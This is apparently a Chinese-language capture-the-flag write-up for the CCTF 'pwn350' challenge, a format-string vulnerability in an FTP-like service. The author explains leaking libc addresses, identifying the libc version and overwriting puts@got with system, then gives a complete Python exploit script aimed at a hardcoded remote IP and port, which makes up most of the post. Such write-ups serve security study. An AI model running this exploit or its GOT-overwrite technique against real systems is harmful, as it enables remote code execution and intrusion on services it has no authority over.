0x00:

之前打了CCTF,在CCTF的过程中遇到一个比较有意思的思路,记录一下。

0x01:

可以看到,这是一个 fmt 的漏洞,不过很简单,接收的输入都在stack中,可以确定输入在栈中的位置,可以做到 任意地址读写。

一般来说,对于这种类型的漏洞,写shellcode到合适的地址然后跳转过去,或者leaksystem地址,改其他函数的got,都是可以拿一个shell的。

本来,我的思路很窄,想的是构造一个循环,去leak我需要的函数,然后改got去拿shell

之后joker师傅提点了我一下,可以leak任意两个函数地址,然后去 libcdb.com 查一波libc的版本,就可以确定libc版本,从而得到system的偏移。

0x02:

综上利用思路就是,leak出任意两个函数地址,然后确定system()的偏移,改掉puts@got,构造puts调用的参数为/bin/sh 就可以拿到shell啦。

这是我找libc的时候截图

0x03:

from zio import *

#target = './pwn3'

target = ('120.27.155.82',9000)

r_m = COLORED(RAW, "green")

w_m = COLORED(RAW, "red")

pwd = "rxraclhm"

def put_file(name,content):

	io.read_until('ftp>')

	io.writeline("put")

	io.read_until("upload:")

	io.writeline(name)

	io.read_until("content:")

	io.writeline(content)

def get_file(name):

	io.read_until('ftp>')

	io.writeline("get")

	io.read_until('get:')

	io.writeline(name)

def get_file2(name):

	io.writeline("get")

	io.read_until('get:')

	io.writeline(name)

def put_file2(name,content):

	io.writeline("put")

	io.read_until("upload:")

	io.writeline(name)

	io.read_until("content:")

	io.writeline(content)

pl1 = l32(0x0804A014) #printf@got

pl1 += ",%7$s,"

pl2 = l32(0x0804A024) #malloc@got

pl2 += ",%7$s,"

pl3 = l32(0x0804A028) #puts@got

pl3 += ",%7$s,"

offset_puts_to_system = 0x00065650 - 0x00040190

#offset_puts_to_system = 0x269a0    # local 

io = zio(target,print_read=r_m,print_write=w_m,timeout=999)

io.read_until('):')

io.writeline(pwd)

put_file("a",pl3)

#raw_input('$$$$')

get_file("a")

rec = io.read_until('>').strip()

junk1,addr,junk2 = rec.split(',')

print "[*]puts is at:%s" % (addr[0:4][::-1] or '').encode('hex')

addr = addr[0:4][::-1].encode('hex')

system_addr = hex(int(addr,16) - offset_puts_to_system)

puts_addr   = hex(int(addr,16))

print "[*]system is at:" + system_addr

x = int(addr,16) - offset_puts_to_system

#a,b,c,d = [(x >> i) & 0b11111111 for i in range(0, 25, 16)]

a,b = [(x >> i) & 0b1111111111111111 for i in range(0, 25, 16)]

print hex(a)+","+hex(b)

put_file2("c",l32(0x0804A028)+"%%%dc"%(a-4)+"%7$hn")

raw_input('$$$')

get_file("c")

put_file2("d",l32(0x0804A028+2)+"%%%dc"%(b-4)+"%7$hn")

get_file("d")

put_file2("/bin/sh;","test")

io.writeline('dir')

io.interact()

0x04:

get shell

[CCTF] pwn350的更多相关文章

  1. CCTF部分赛题分析

    这次算是跟着师傅们全程打完了CCTF的线上赛,一些强队的WriteUp也放了出来.这篇文章主要是想跟着大牛的思路把那些题重新再过一遍. PWN3 这个是格式化字符串漏洞的题.printf的格式化串直接 ...

  2. Java基础语法

    java基础学习总结——基础语法1 一.标识符

  3. java基础学习总结——基础语法1

    一.标识符

  4. java 基础语法 1

    一.标识符 二.关键字 三.JAVA基础数据类型 3.1. java常量 3.2. java变量 从本质上来讲,变量其实是内存里面的一小块区域,一个程序在运行的时候,实际上这个程序是位于内存里面,然后 ...

  5. 做ctf题对malloc的疑问

    做cctf pwn printf题目的时候 疑问为什么dir函数会将之前out的name倒叙输出 调试了一下发现当malloc(0xf4)大小时候,例如 第一次分配0x1000的地址,将名字输入到0x ...

  6. Sql Server约束的学习二(检查约束、默认约束、禁用约束)

    接上一篇的Sql Server约束学习一(主键约束.外键约束.唯一约束) 4.检查约束 1)检查约束的定义 检查约束可以和一个列关联,也可以和一个表关联,因为它们可以检查一个列的值相对于另一个列的值, ...

  7. BugKu 杂项-这么多数据包

    前边的都是些无关紧要,只要有点网络的基础我想应该都能懂,往下看,一直到NO104,这是在干什么? 源ip138一直向目标ip159发送syn握手包,想要建立连接,其实就是端口扫描,原理就是,想和你某个 ...

  8. java基础—基础语法1

    一.标识符

  9. IDA动态调试技术及Dump内存

    IDA动态调试技术及Dump内存 来源 https://blog.csdn.net/u010019468/article/details/78491815 最近研究SO文件调试和dump内存时,为了完 ...

随机推荐

  1. foreach中的&用法

    原地址:https://blog.csdn.net/qq_38287952/article/details/79468321 例如,给数组添加一个新的元素. 这里的需求是统计商品收入,就可以用到&am ...

  2. django ajax MTV与MVC 多对多创建方式

    MTV与MVC MTV模型(django): M:模型层(models.py) T:templates V:views MVC模型: M:模型层(models.py) V:视图层(views.py) ...

  3. pycharm虚拟环境的搭建

    目录 优点 windows 安装 配置虚拟环境管理器工作目录 MacOS.Linux 安装 工作文件 配置 使用 pycharm使用 新建项目 添加环境 使用环境 优点 1.使不同应用开发环境相互独立 ...

  4. Djangon简介

    目录 Djangon简介 MVC与MTV模型 MVC MTV python三大主流web框架 Django的下载与基本命令 基于Django实现的一个简单示例 Django静态文件配置 Django ...

  5. 二维数组(解引用、指针数组、数组的指针)——C语言

    二维数组 在说二维数组前先来说下一维数组中的指针数组和和数组的指针 一.一维数组中指针数组和数组指针的区别 指针数组: ]; []的优先级比*高,首先它是一个数组,它的大小是5,它里面存放的数据类型是 ...

  6. JSON函数表

    jsoncpp 主要包含三个class:Value.Reader.Writer.注意Json::Value 只能处理 ANSI 类型的字符串,如果 C++ 程序是用 Unicode 编码的,最好加一个 ...

  7. django 支持跨域请求配置

    参考:https://www.jianshu.com/p/63fb55bee142 核心注意点:

  8. nginx 配置反向代理和负载均衡

    Nginx的配置文件: nginx安装目录/conf/nginx.conf 重新加载配置文件 ./nginx -s reload 配置虚拟主机 一个server就是一台虚拟主机 server { li ...

  9. java.sql.SQLException: Could not retrieve transaction read-only status from server 问题解决

    网上有2种主要说法 第一种 问题描述: java代码在开始事务后,先做了一个查询,再insert,此时会报:          java.sql.SQLException: could not ret ...

  10. 输入列号得到excel对应的字母列

    zexcel_cell_column 类型是INT4 FUNCTION ZGET_EXCEL_COL. *"----------------------------------------- ...